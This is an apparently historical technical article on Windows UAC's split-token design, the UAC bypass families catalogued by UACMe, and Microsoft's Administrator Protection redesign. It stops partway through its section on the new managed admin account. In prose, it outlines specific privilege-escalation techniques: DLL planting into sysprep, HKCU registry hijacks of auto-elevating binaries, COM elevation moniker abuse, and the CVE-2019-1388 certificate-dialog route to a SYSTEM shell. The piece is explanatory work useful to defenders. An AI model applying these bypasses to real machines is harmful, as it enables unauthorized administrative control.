&lt;p&gt;For twenty years, an elevated Windows command prompt reported the same user name as the unelevated one. The integrity level changed. The token changed. The user did not. That single architectural fact is the load-bearing premise of every UAC bypass ever published. The Vista User Account Control design from 2006 issued two tokens at logon for a member of the local Administrators group: a filtered standard-user token for everyday work, and a full admin token linked to it via the &lt;code&gt;TokenLinkedToken&lt;/code&gt; field [@ms-uac-how-it-works]. When the user clicked Yes on a consent prompt, the Application Information service called &lt;code&gt;CreateProcessAsUser&lt;/code&gt; with the linked token. Same user. Same profile. Same &lt;code&gt;HKCU&lt;/code&gt;. Same logon session. Different integrity level.&lt;/p&gt;
&lt;p&gt;Four resources stayed shared between the filtered and full tokens, and four categories of attack grew out of them. Files dropped in a writable directory the elevated process trusts. Registry values planted under &lt;code&gt;HKEY_CURRENT_USER&lt;/code&gt; that an elevated binary reads before it consults &lt;code&gt;HKEY_CLASSES_ROOT&lt;/code&gt;. COM elevation monikers that hand the attacker an elevated &lt;code&gt;IFileOperation&lt;/code&gt; interface. Path-resolution overrides that redirect &lt;code&gt;%SystemRoot%&lt;/code&gt; for a single auto-elevating process. The UACMe project [@uacme] catalogues 81 such methods, each one a load against the shared-resource shape of Vista&apos;s split token.&lt;/p&gt;
&lt;p&gt;Administrator Protection inverts that shape. The elevated administrator becomes a &lt;em&gt;different account&lt;/em&gt; with a different security identifier, a different profile directory, a different &lt;code&gt;NTUSER.DAT&lt;/code&gt; hive, a different authentication-ID LUID, and a different DOS device object directory under &lt;code&gt;\Sessions\0\DosDevices\&lt;/code&gt;. The operating system manages the account itself. It is created on demand the first time the policy is enabled, linked to the primary admin via paired Security Account Manager attributes, used in a fresh logon session for every elevation, and the elevated token is destroyed when the process exits [@ms-developer-blog-2025, @call4cloud-osint].&lt;/p&gt;
&lt;p&gt;The feature ships under four names -- &lt;strong&gt;Administrator Protection&lt;/strong&gt; in Microsoft Learn, &lt;strong&gt;Adminless&lt;/strong&gt; as the community shorthand this article uses, &lt;strong&gt;ShadowAdmin&lt;/strong&gt; in the &lt;code&gt;samsrv.dll&lt;/code&gt; engineering symbols, &lt;strong&gt;System Managed Administrator Account (SMAA)&lt;/strong&gt; in the Windows Developer Blog [@ms-admin-protection, @ms-developer-blog-2025, @call4cloud-osint] -- and §6 walks each in turn. The launch arc was short: announced at Ignite 2024 by David Weston on November 19, 2024 [@bleepingcomputer-2024], surfaced earlier that fall in Insider Preview build 27718 on October 2, 2024 [@ms-insider-build-27718], shipped to stable Windows in KB5067036 on October 28, 2025 [@ms-kb5067036], and disabled on December 1, 2025 over a WebView2 application-compatibility regression [@forshaw-pz-jan2026, @ms-admin-protection].&lt;/p&gt;
&lt;p&gt;This article walks what changed and what did not. By the end you will know exactly which UAC bypass families are dead, exactly which survive, exactly what the December 2025 revert was about, and exactly where the new boundary still leaks. The path runs through twenty years of design tradeoffs and seven years of binary-level fixes that never converged on a real boundary. It runs through nine Project Zero bypasses Microsoft fixed before shipping. It ends at a question Microsoft&apos;s own design documents do not yet answer: when the prompt is a credential gate instead of a click-through, what is left for the attacker to do?&lt;/p&gt;
&lt;p&gt;The first thing to understand is what UAC was trying to do, and why Microsoft said for twenty years it was not a security boundary.&lt;/p&gt;
&lt;h2&gt;2. &quot;Convenience, not boundary&quot;: UAC as Microsoft conceived it&lt;/h2&gt;
&lt;p&gt;Why did Vista ship UAC at all? For most of Windows history, every interactive logon for a member of the local Administrators group produced one full-admin token. The desktop shell ran as a full administrator. Every child process inherited those rights. The worm era of 2003 to 2005 demonstrated, repeatedly, that one process running in user context owned the whole machine. By 2006 the cost of admin-by-default had become impossible to defend [@wikipedia-uac].The pre-Vista &lt;em&gt;Limited User Account&lt;/em&gt; (LUA) was Microsoft&apos;s first attempt at a fix. The conceptual ancestor of the filtered token failed in practice because roughly half of the third-party application base broke under it, and the documented workaround -- &lt;code&gt;RUNAS.EXE&lt;/code&gt; -- was operationally hostile enough that almost no one used it.&lt;/p&gt;
&lt;p&gt;The redesign that produced UAC pivoted on a single observation. Forcing administrators to run as standard users had failed because too much software assumed admin rights. So Vista would give each admin user &lt;em&gt;two&lt;/em&gt; identities. One would be standard-user enough to run the desktop, the browser, and the day-to-day applications without privilege. The other would carry the admin rights, and the operating system would arrange for the user to opt into it on a per-task basis.&lt;/p&gt;
&lt;p&gt;Mark Russinovich&apos;s June 2007 article &lt;em&gt;Inside Windows Vista User Account Control&lt;/em&gt; in TechNet Magazine [@russinovich-2007-vista] remains the canonical reference for the design. The mechanism is two tokens at logon; the integrity-level taxonomy (Low, Medium, High, System) gating object access; file-system and registry virtualisation rerouting writes by legacy apps; and Mandatory Integrity Control enforcing the no-write-up rule at the kernel-object boundary.&lt;/p&gt;

The mechanism by which Vista UAC assigns two distinct access tokens to a single interactive logon for a member of the local Administrators group. The Local Security Authority issues both at logon: a filtered standard-user token with most privileges removed and the Administrators group marked as deny-only, and a linked full administrator token referenced from the filtered token&apos;s `TokenLinkedToken` field [@ms-uac-how-it-works].
&lt;p&gt;The disclaimer that follows the design is the single most quoted sentence Russinovich ever published about UAC. The article will lift it verbatim once, because every Administrator Protection design decision falls out of its absence:&lt;/p&gt;

It&apos;s important to be aware that UAC elevations are conveniences and not security boundaries. -- Mark Russinovich, *Inside Windows Vista User Account Control*, TechNet Magazine, June 2007 [@russinovich-2007-vista]
&lt;p&gt;This is not an accidental disclaimer. It is the canonical Microsoft classification, preserved into the Microsoft Security Servicing Criteria document [@msrc-servicing-criteria]. James Forshaw of Google Project Zero, writing in January 2026, re-states the position verbatim: &quot;due to the way it was designed, it was quickly apparent it didn&apos;t represent a hard security boundary, and Microsoft downgraded it to a security feature&quot; [@forshaw-pz-jan2026]. The classification is what determined what Microsoft would and would not pay attention to. A &quot;security boundary&quot; gets a security bulletin when an attacker crosses it. A &quot;security feature&quot; does not. A bypass of a boundary is a vulnerability. A bypass of a feature is a quality bug. For twenty years, UAC bypasses were quality bugs.&lt;/p&gt;
&lt;p&gt;The two-tokens-at-logon mechanism is the shape from which the entire bypass canon grows. The twenty years of evolution that follow run along a single timeline.&lt;/p&gt;

timeline
    title Privilege separation in Windows, NT 3.1 to Administrator Protection
    1993 : NT 3.1 ships multi-user accounts and DACLs but admin-by-default desktop culture
    2006 : Vista UAC introduces the split-token model and Mandatory Integrity Control
    2009 : Davidson publishes the first UAC bypass; Windows 7 ships auto-elevation
    2014 : hfiref0x&apos;s UACMe catalogue collects the bypass canon
    2016 : enigma0x3 publishes the registry-hijack family (eventvwr, fodhelper, sdclt)
    2019 : CVE-2019-1388 (consent.exe certificate dialog) is the lone UAC LPE bulletin
    2024 : Insider Preview build 27718 surfaces Administrator Protection; Ignite 2024 announces it
    2025 : KB5067036 ships the SMAA on stable Windows, then reverts on December 1
    2026 : Forshaw&apos;s nine pre-GA bypasses all fixed; the elevation path is now a security boundary
&lt;p&gt;To see why the entire bypass canon grew out of the split-token shape, the next section walks the mechanic at function-name granularity. It is the load-bearing pre-history of everything that comes after.&lt;/p&gt;
&lt;h2&gt;3. The Vista UAC split-token in detail&lt;/h2&gt;
&lt;p&gt;The mechanics at logon. The Local Security Authority Subsystem Service (LSASS) validates credentials. For a user in the local Administrators group, it constructs two tokens. The filtered token has its dangerous privileges removed and the Administrators SID marked deny-only; the full token retains them. The Token Manager wires the filtered token&apos;s &lt;code&gt;TokenLinkedToken&lt;/code&gt; field to a handle on the full token. LSASS hands the filtered token to &lt;code&gt;winlogon.exe&lt;/code&gt;. Winlogon launches &lt;code&gt;userinit.exe&lt;/code&gt;. Userinit launches &lt;code&gt;explorer.exe&lt;/code&gt;. The shell, holding the filtered token, becomes the parent process from which every user-initiated process inherits [@ms-uac-how-it-works].&lt;/p&gt;

The kernel structure that connects the filtered standard-user token to the linked full administrator token in Vista&apos;s split-token model. A process holding the filtered token can read the `TokenLinkedToken` field via the `GetTokenInformation` API to discover the handle of the full token, and pass that handle to `CreateProcessAsUser` to launch an elevated child. The same link is the structural premise of token-stealing attacks: any code path that can read or impersonate the linked token bypasses the consent UI entirely [@ms-uac-how-it-works, @forshaw-pz-jan2026].
&lt;p&gt;The shell shares four resources with anything launched under the full token.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;The same user security identifier.&lt;/strong&gt; Both tokens carry the same primary SID. Files, registry keys, and kernel objects that grant access to the user grant identical access to both processes.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The same &lt;code&gt;%USERPROFILE%&lt;/code&gt; directory tree.&lt;/strong&gt; &lt;code&gt;C:\Users\&amp;lt;user&amp;gt;\&lt;/code&gt; is the home of both. The Documents folder, the Downloads folder, the AppData hives, and any application-specific subdirectory belong to one user.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The same &lt;code&gt;HKEY_CURRENT_USER&lt;/code&gt; hive.&lt;/strong&gt; Both tokens map &lt;code&gt;HKCU&lt;/code&gt; to the same &lt;code&gt;NTUSER.DAT&lt;/code&gt; file. An elevated process that reads a user setting reads the value the unelevated user wrote.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The same logon-session LUID.&lt;/strong&gt; The Locally Unique Identifier that identifies an interactive logon session is the same on both tokens. The kernel uses that LUID as a key for per-logon-session caching: the DOS device object directory at &lt;code&gt;\Sessions\0\DosDevices\&amp;lt;LUID&amp;gt;&lt;/code&gt;, drive-letter mappings, mapped network drives, and the credential cache.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The elevation pipeline. A user clicks Yes on a UAC prompt. The mechanism beneath that click runs through a chain of named function calls.&lt;/p&gt;

sequenceDiagram
    participant User as User shell (filtered token)
    participant AppInfo as appinfo.dll (Application Information service)
    participant Consent as consent.exe (secure desktop)
    participant LSA as LSASS
    participant New as Elevated child process&lt;pre&gt;&lt;code&gt;User-&amp;gt;&amp;gt;AppInfo: ShellExecute / CreateProcess &quot;as admin&quot;
AppInfo-&amp;gt;&amp;gt;AppInfo: RAiLaunchAdminProcess RPC
AppInfo-&amp;gt;&amp;gt;AppInfo: Read manifest requestedExecutionLevel
AppInfo-&amp;gt;&amp;gt;AppInfo: Check ConsentPromptBehaviorAdmin
AppInfo-&amp;gt;&amp;gt;Consent: Launch consent.exe on Winlogon desktop
Consent-&amp;gt;&amp;gt;User: Show Yes / No prompt
User--&amp;gt;&amp;gt;Consent: Click Yes
Consent--&amp;gt;&amp;gt;AppInfo: Approved
AppInfo-&amp;gt;&amp;gt;LSA: Resolve TokenLinkedToken handle
AppInfo-&amp;gt;&amp;gt;New: CreateProcessAsUser(linked full token)
Note over New: Same SID and profile and HKCU and logon session
Note over New: Integrity level High
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The prompt runs on the &lt;em&gt;secure desktop&lt;/em&gt;, the same Winlogon-owned &lt;code&gt;Winsta0\Winlogon&lt;/code&gt; desktop where the credential-entry dialog appears at logon, not the user&apos;s interactive &lt;code&gt;Winsta0\Default&lt;/code&gt; desktop [@ms-uac-how-it-works]. User Interface Privilege Isolation (UIPI) blocks lower-integrity input from reaching higher-integrity windows; the secure-desktop switch is its first defence against synthetic-keystroke attacks against the prompt itself.The secure desktop is not invulnerable. It changes the integrity-isolation context, but a process holding the filtered token can still trigger the switch (that is the whole point of clicking Yes), and code running before the switch can in principle modify the surrounding UI state. CVE-2019-1388 in late 2019 turned out to exploit a different aspect entirely -- a UI-interaction path through the consent.exe certificate-viewer dialog -- and not the secure-desktop switch itself.&lt;/p&gt;
&lt;p&gt;Compare this to what comes next. Both tokens share four resources. Each of those resources is a category of attack waiting for a researcher to find it. The next section is the story of what happened when Microsoft tried to make UAC less annoying by silently elevating its own Microsoft-signed binaries -- and what the bypass canon did with the change.&lt;/p&gt;
&lt;h2&gt;4. Windows 7 auto-elevation and the birth of the bypass canon&lt;/h2&gt;
&lt;p&gt;A specific moment. December 2009. Leo Davidson publishes &lt;em&gt;Windows 7 UAC whitelist: Code-injection Issue / Anti-Competitive API / Security Theatre&lt;/em&gt; on pretentiousname.com [@davidson-2009]. The title is the argument. The page itself is sprawling, contentious, and on a few key technical points exactly right. Microsoft&apos;s response, in Davidson&apos;s own words: &quot;this is a non-issue, and ignored my offers to give them full details for several months.&quot; Microsoft Security Essentials eventually classified the &lt;em&gt;binary&lt;/em&gt; (not the technique) as &lt;code&gt;HackTool:Win32/Welevate.A&lt;/code&gt; and &lt;code&gt;HackTool:Win64/Welevate.A&lt;/code&gt;; in Davidson&apos;s pointed observation, &quot;recompiling the binaries in VS2010 means they are no longer detected&quot; [@davidson-2009].Davidson kept writing into his original page over the following decade. A marker buried inside the text reads &quot;As I was typing more words into this page, this appeared in my text editor at the 10,000th word!&quot; In March 2020 he removed the proof-of-concept binaries, noting &quot;I got sick of the page being marked as malware, even by Google (FFS).&quot; The prose remains the canonical first source on UAC bypasses [@davidson-2009].&lt;/p&gt;
&lt;p&gt;What Windows 7 added, in October 2009, to fix Vista&apos;s prompt-fatigue problem [@russinovich-2009-win7]:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The &lt;code&gt;autoElevate=true&lt;/code&gt; manifest attribute, embedded in selected Microsoft-signed Windows binaries.&lt;/li&gt;
&lt;li&gt;An internal whitelist of Microsoft-signed binaries living under &lt;code&gt;%SystemRoot%\System32&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;COM Elevation Moniker&lt;/strong&gt; -- already shipping in Vista (&lt;code&gt;BIND_OPTS3&lt;/code&gt;, syntax &lt;code&gt;Elevation:Administrator!new:&amp;lt;CLSID&amp;gt;&lt;/code&gt;) -- was the activation primitive. Windows 7 extended &lt;em&gt;implicit&lt;/em&gt; auto-elevation to qualifying COM servers whose registrations matched the new whitelist criteria, so callers such as &lt;code&gt;IFileOperation&lt;/code&gt;, &lt;code&gt;ICMLuaUtil&lt;/code&gt;, and &lt;code&gt;IColorDataProxy&lt;/code&gt; could be launched elevated without a consent prompt under the Win7 model [@russinovich-2009-win7, @uacme]. The dedicated registry-curation surface, the &lt;code&gt;COMAutoApprovalList&lt;/code&gt; (&lt;code&gt;HKLM\Software\Microsoft\Windows NT\CurrentVersion\UAC\COMAutoApprovalList&lt;/code&gt;) that UACMe Method 49 references verbatim, did &lt;em&gt;not&lt;/em&gt; ship in Windows 7; it was introduced seven years later in Windows 10 RS1 (build 14393, August 2016) as a Redstone-1 hardening that replaced implicit COM auto-elevation with explicit list curation [@uacme].&lt;/li&gt;
&lt;li&gt;The default consent-prompt behaviour &lt;code&gt;ConsentPromptBehaviorAdmin = 5&lt;/code&gt;: prompt for consent for non-Windows binaries [@russinovich-2009-win7].&lt;/li&gt;
&lt;/ol&gt;

The Windows 7 mechanism by which selected Microsoft-signed binaries elevate without showing the consent prompt to a user who is a member of the local Administrators group. The Application Information service consults a whitelist of signature, path, and manifest attributes; if the binary qualifies, `appinfo.dll` calls `CreateProcessAsUser` with the linked full token and no UI step at all [@russinovich-2009-win7].

A COM activation syntax introduced in Windows Vista that lets an unelevated caller request an elevated instance of a COM server class. The `IBindCtx` is augmented with a `BIND_OPTS3` structure carrying a window handle to attribute the prompt to. The bind moniker `Elevation:Administrator!new:&amp;lt;CLSID&amp;gt;` causes the COM Service Control Manager to launch the server elevated. UACMe methods that target `IFileOperation`, `ICMLuaUtil`, and `IColorDataProxy` all descend from this mechanism [@russinovich-2009-win7, @uacme].
&lt;p&gt;Davidson&apos;s technique against the new whitelist is one paragraph of detail. Use the &lt;code&gt;IFileOperation&lt;/code&gt; COM elevation moniker, which itself auto-elevates, to write a planted &lt;code&gt;CRYPTBASE.DLL&lt;/code&gt; into &lt;code&gt;%SystemRoot%\System32\sysprep\&lt;/code&gt;. The path is a writable destination from the limited token because &lt;code&gt;IFileOperation&lt;/code&gt; runs elevated. Then launch &lt;code&gt;sysprep.exe&lt;/code&gt;, which is auto-elevated as a Microsoft-signed binary in System32. Sysprep loads &lt;code&gt;CRYPTBASE.DLL&lt;/code&gt; from its own directory before the system path. The attacker&apos;s DLL runs at High integrity in the elevated sysprep process [@davidson-2009, @uacme]. No prompt. The whitelist did the work.&lt;/p&gt;
&lt;p&gt;The bypass canon. Davidson&apos;s technique was the start, not the totality. The successors walked the same shape across families.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;The DLL side-load family.&lt;/strong&gt; Sysprep was the canonical instance. Subsequent variants targeted &lt;code&gt;cliconfg.exe&lt;/code&gt;, &lt;code&gt;mcx2prov.exe&lt;/code&gt;, &lt;code&gt;migwiz.exe&lt;/code&gt;, and &lt;code&gt;setupsqm.exe&lt;/code&gt; -- each an auto-elevating Microsoft binary that loaded a DLL from a writable directory before consulting the system path. Microsoft removed the auto-elevation attribute from many of these binaries over the Windows 10 1709 cycle, but did so one binary at a time [@uacme].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The registry-hijack family.&lt;/strong&gt; Matt Nelson&apos;s August 2016 disclosure of an &lt;code&gt;eventvwr.exe&lt;/code&gt; plus &lt;code&gt;HKCU\Software\Classes\mscfile\shell\open\command&lt;/code&gt; bypass [@enigma0x3-2016-eventvwr] established the pattern. An auto-elevating binary consults &lt;code&gt;HKEY_CURRENT_USER&lt;/code&gt; before &lt;code&gt;HKEY_CLASSES_ROOT&lt;/code&gt; for a value the binary trusts to dispatch a child process. The limited user, who owns &lt;code&gt;HKCU&lt;/code&gt;, writes whatever they want into the value. The elevated binary executes the attacker&apos;s command line. March 2017 produced &lt;code&gt;sdclt.exe&lt;/code&gt; plus App Paths [@enigma0x3-2017-app-paths] and &lt;code&gt;sdclt.exe&lt;/code&gt; plus &lt;code&gt;IsolatedCommand&lt;/code&gt; [@enigma0x3-2017-sdclt]; May 2017 produced the &lt;code&gt;fodhelper.exe&lt;/code&gt; plus &lt;code&gt;ms-settings&lt;/code&gt; variant [@uacme]. All fileless. All generalising to any auto-elevating binary that walks &lt;code&gt;HKCU&lt;/code&gt; before &lt;code&gt;HKCR&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The COM-elevation-moniker abuse family.&lt;/strong&gt; UACMe&apos;s Method 1 (Davidson&apos;s original &lt;code&gt;IFileOperation&lt;/code&gt;) ages into Methods 41 (&lt;code&gt;ICMLuaUtil&lt;/code&gt;, Oddvar Moe, via &lt;code&gt;ucmCMLuaUtilShellExecMethod&lt;/code&gt;) and 43 (&lt;code&gt;IColorDataProxy&lt;/code&gt; paired with &lt;code&gt;ICMLuaUtil&lt;/code&gt;, Oddvar Moe derivative, via &lt;code&gt;ucmDccwCOMMethod&lt;/code&gt;), each one a different COM interface that auto-elevates and exposes a method useful for arbitrary file or registry write [@uacme].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The environment-variable and path-poisoning family.&lt;/strong&gt; Per-process &lt;code&gt;%windir%&lt;/code&gt; or &lt;code&gt;%SystemRoot%&lt;/code&gt; redirection via registry shims and Image File Execution Options, redirecting auto-elevating binaries to load resources from attacker-controlled directories.&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The Windows 7 auto-elevation whitelist &lt;em&gt;was&lt;/em&gt; the bypass. The day Microsoft shipped a class of binaries that could elevate silently based on signing and path, the entire problem of UAC bypass reduced to &quot;make one of those binaries do something the attacker wants it to do.&quot; Every UACMe method that targets a Microsoft-signed binary in &lt;code&gt;System32&lt;/code&gt; descends from this design choice. The 81-method catalogue is not a list of separate vulnerabilities; it is one architectural mistake spreading through the binary inventory.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Enter &lt;strong&gt;hfiref0x&apos;s UACMe&lt;/strong&gt; [@uacme]. The project has been on GitHub since 2014. It currently lists 81 named methods. Each entry pairs the method number with the author credit, the target binary, the technique class, and the &quot;Fixed in&quot; build number. The README, taken together, is the institutional memory of UAC&apos;s failure as a boundary. Forshaw&apos;s January 2026 framing is the operational summary: &quot;A good repository of known bypasses is the UACMe tool which currently lists 81 separate techniques for gaining administrator privileges&quot; [@forshaw-pz-jan2026].&lt;/p&gt;
&lt;p&gt;Microsoft chose to fix individual bypasses rather than redesign the model. The next section asks whether seven years of fixes ever caught up.&lt;/p&gt;
&lt;h2&gt;5. 2017-2024: incremental hardening, no convergence&lt;/h2&gt;
&lt;p&gt;The middle Windows 10 era was the moment Microsoft treated UAC bypasses as a quality problem and shipped fixes at quality-fix cadence, not security-bulletin cadence. The work was real, but it was always one binary or one interface at a time.&lt;/p&gt;
&lt;p&gt;The named milestones, kept short.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Windows 10 1709 (October 2017).&lt;/strong&gt; Beginning with this build, &lt;code&gt;IFileOperation&lt;/code&gt; auto-elevation for callers other than Explorer was restricted [@uacme]. The originating Davidson 2009 family of bypasses, against the sysprep + planted-CRYPTBASE shape, ceased to function for processes other than the shell itself.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Tighter &lt;code&gt;appinfo.dll&lt;/code&gt; manifest parsing across multiple Windows 10 builds.&lt;/strong&gt; Stricter binary-signature checks. Stricter path checks. Stricter manifest checks. Each of these closed individual bypass methods; none of them closed a family.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Per-binary hardening recorded in UACMe&apos;s &quot;Fixed in&quot; column.&lt;/strong&gt; UACMe version 3.5.0 retired roughly eighty percent of the 2014-vintage catalogue as obsolete; the v3.2.x branch retains the full historical record. The project&apos;s README warns that &quot;since version 3.5.0, all previously &apos;fixed&apos; methods are considered obsolete and have been removed. If you need them, use v3.2.x branch&quot; [@uacme].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;CVE-2019-1388 (November 2019; reporter: Eduardo Braun Prado via Trend Micro&apos;s Zero Day Initiative).&lt;/strong&gt; The lone departure from the &quot;UAC bypasses get no CVE&quot; rule. A UI-interaction path through &lt;code&gt;consent.exe&lt;/code&gt;&apos;s certificate-viewer dialog: an unsigned application could trigger consent.exe to display a certificate dialog whose &quot;View Certificate&quot; link launched Internet Explorer running as &lt;code&gt;NT AUTHORITY\SYSTEM&lt;/code&gt;, and IE&apos;s File menu opened &lt;code&gt;cmd.exe&lt;/code&gt; at the same integrity level [@nvd-cve-2019-1388]. Microsoft fixed it on the November 2019 Patch Tuesday and gave it an LPE bulletin.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;CVE-2019-1388 was a &lt;em&gt;prompt-UI&lt;/em&gt; bug -- specifically, a crash-path that surfaced an IE process at SYSTEM integrity via the certificate viewer -- not a UAC-bypass bug in the categorical sense. The classification distinction matters: Microsoft did not change its position that UAC was not a boundary; the bulletin treated this as a separate UI defect that incidentally crossed the boundary. CISA later added the CVE to the Known Exploited Vulnerabilities Catalog [@nvd-cve-2019-1388].&lt;/p&gt;
&lt;p&gt;The accumulating evidence by 2024 was three observations.&lt;/p&gt;
&lt;p&gt;UACMe&apos;s catalogue has grown from its 2014 origins to 81 methods today [@uacme]. Each &lt;em&gt;family&lt;/em&gt; of attack survived the &lt;em&gt;individual&lt;/em&gt; fixes. As Davidson predicted in 2009, the auto-elevation whitelist was the structural problem; patching each whitelisted binary as a separate bug was a treadmill, not a convergence.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s own Security Servicing Criteria continued to classify UAC as a security feature, not a boundary, throughout the period [@msrc-servicing-criteria, @forshaw-pz-jan2026]. The decision was load-bearing. Fixing the elevation pipeline at &lt;em&gt;quality&lt;/em&gt; cadence meant accepting that bypasses would appear quarterly and would not appear in the Patch Tuesday bulletins until the day Microsoft changed its mind about the classification.&lt;/p&gt;
&lt;p&gt;The third piece of evidence is what the attackers were doing while the defenders were churning the binary list. Microsoft&apos;s own number, quoted by the Windows Developer Blog from the Microsoft Digital Defense Report 2024, is &lt;em&gt;39,000 token-theft incidents per day&lt;/em&gt; [@ms-developer-blog-2025]. A token, once stolen from an elevated process, requires no further bypass: it is a bearer credential good for the lifetime of the logon session. The same logon session is the one the unelevated user and the elevated process share under the split-token model. The &quot;one logon session&quot; property of UAC&apos;s design is the structural premise that token theft depends on.&lt;/p&gt;
&lt;p&gt;There is one further thread worth naming here. Forshaw&apos;s broader 2022 Kerberos work in the user-credential-delegation space is a thread that survives the elevation-redesign question entirely. The May 2022 &lt;em&gt;Exploiting RBCD using a normal user account&lt;/em&gt; post [@forshaw-2022-rbcd] is the representative artifact. Network-credential delegation primitives -- Resource-Based Constrained Delegation, User-to-User Kerberos, S4U2Self -- operate at a layer beneath token-level elevation, and survive even a perfect SMAA design because they do not run through the elevation path at all.&lt;/p&gt;
&lt;p&gt;Piecewise fixes never converged on a boundary. The question that drove the next five years of Microsoft work was the obvious one: if the issue is the shared-resource model itself, what is the smallest plausible change that fixes it?&lt;/p&gt;
&lt;h2&gt;6. The breakthrough: the System Managed Administrator Account&lt;/h2&gt;
&lt;p&gt;The load-bearing design decision is one sentence. Stop trying to make one user account play both roles. The elevated administrator should be a different account with a different SID, a different profile, a different &lt;code&gt;HKCU&lt;/code&gt;, a different logon session, and a different DOS device object directory -- and the operating system should manage that account itself.&lt;/p&gt;
&lt;p&gt;What is striking about the design is how prosaic the underlying mechanism is. Multi-user accounts have shipped with Windows NT since version 3.1 in 1993. The architecture for running an elevated process under a separate local user has been present in NT for thirty-three years. What changed is that Microsoft finally chose to &lt;em&gt;enforce&lt;/em&gt; the multi-user model for privilege separation, by making the operating system itself create and manage the second account, link it to the primary admin via paired Security Account Manager attributes, and use it for every elevation. The sophistication is in linkage, in lifecycle, and in &lt;em&gt;removing auto-elevation&lt;/em&gt;, not in any single new primitive.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The thing that changes between UAC and Administrator Protection is not the elevation &lt;em&gt;mechanism&lt;/em&gt; (a manifest, a prompt, a &lt;code&gt;CreateProcessAsUser&lt;/code&gt; call) but the elevation &lt;em&gt;classification&lt;/em&gt;. An elevation bypass used to be a quality bug. It is now a security-bulletin vulnerability. Every Administrator Protection design decision -- separate account, fresh logon session, removed auto-elevation, Hello-gated consent -- is a consequence of the classification change.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The names. Microsoft Learn&apos;s term is &lt;strong&gt;Administrator Protection&lt;/strong&gt; [@ms-admin-protection]. Microsoft&apos;s announcement material at Ignite 2024 and in the Insider Preview build 27718 post uses the same &quot;Administrator Protection&quot; label [@ms-insider-build-27718]; &lt;strong&gt;Adminless&lt;/strong&gt; is the community shorthand that stuck. The internal engineering term in &lt;code&gt;samsrv.dll&lt;/code&gt; (the Security Account Manager service DLL) is &lt;strong&gt;ShadowAdmin&lt;/strong&gt; [@call4cloud-osint]. The Windows Developer Blog&apos;s canonical term for the underlying entity is the &lt;strong&gt;System Managed Administrator Account (SMAA)&lt;/strong&gt; [@ms-developer-blog-2025].&lt;/p&gt;

The hidden local user account that Windows creates per primary administrator when the `TypeOfAdminApprovalMode` policy is set to 2. The SMAA has its own random user name (typically `ADMIN_`), its own SID, its own profile directory under `C:\Users\ADMIN_\`, its own `NTUSER.DAT` and therefore its own `HKCU`, and its own membership in the local Administrators group. The operating system uses it to host elevated processes; the user never logs into it directly [@ms-developer-blog-2025, @call4cloud-osint].
&lt;p&gt;The SMAA lifecycle. Four beats. Each anchored to a verified source.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Provisioning.&lt;/strong&gt; When &lt;code&gt;TypeOfAdminApprovalMode = 2&lt;/code&gt; is set under &lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System&lt;/code&gt; (either by Group Policy or by the Intune Settings Catalog), &lt;code&gt;samsrv.dll&lt;/code&gt;&apos;s &lt;code&gt;ShadowAdminAccount::CreateShadowAdminAccount&lt;/code&gt; runs once per existing local-administrator account. &lt;code&gt;CreateRandomShadowAdminAccountName&lt;/code&gt; produces an &lt;code&gt;ADMIN_&amp;lt;random&amp;gt;&lt;/code&gt; name. &lt;code&gt;AddAccountToLocalAdministratorsGroup&lt;/code&gt; adds the new account to the Administrators group. Accounts managed by Windows LAPS (Local Administrator Password Solution) are skipped; their lifecycle is owned by a different subsystem and Microsoft did not want the SMAA mechanism to fight LAPS rotation [@call4cloud-osint].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Linking.&lt;/strong&gt; Two paired SAM attributes encode the trust relationship between the two accounts. The primary admin&apos;s user record gets a &lt;code&gt;ShadowAccountForwardLinkSid&lt;/code&gt; attribute pointing at the SMAA&apos;s SID. The SMAA&apos;s user record gets a &lt;code&gt;ShadowAccountBackLinkSid&lt;/code&gt; attribute pointing back at the primary admin. These two attributes are the only structural relationship between the two accounts; everything else -- profile, HKCU, group memberships -- is independent [@call4cloud-osint].&lt;/p&gt;

Two paired SAM-database attributes that encode the trust relationship between a primary admin user and its System Managed Administrator Account. The forward link sits on the primary admin&apos;s record and points at the SMAA&apos;s SID. The back link sits on the SMAA&apos;s record and points back at the primary admin. The Application Information service uses the forward link at elevation time to resolve which SMAA to launch the elevated process under [@call4cloud-osint].

The registry value under `HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System` that selects the elevation policy. Value 0 disables UAC. Value 1 selects classic Admin Approval Mode (the Vista / Win7 / Win10 split-token behaviour). Value 2 selects Admin Approval Mode with Administrator Protection: every elevation routes through the SMAA path. The value is set by Group Policy (&quot;User Account Control: Configure type of Admin Approval Mode&quot;) or by an Intune Settings Catalog policy and requires a reboot to take effect [@ms-admin-protection, @call4cloud-osint].
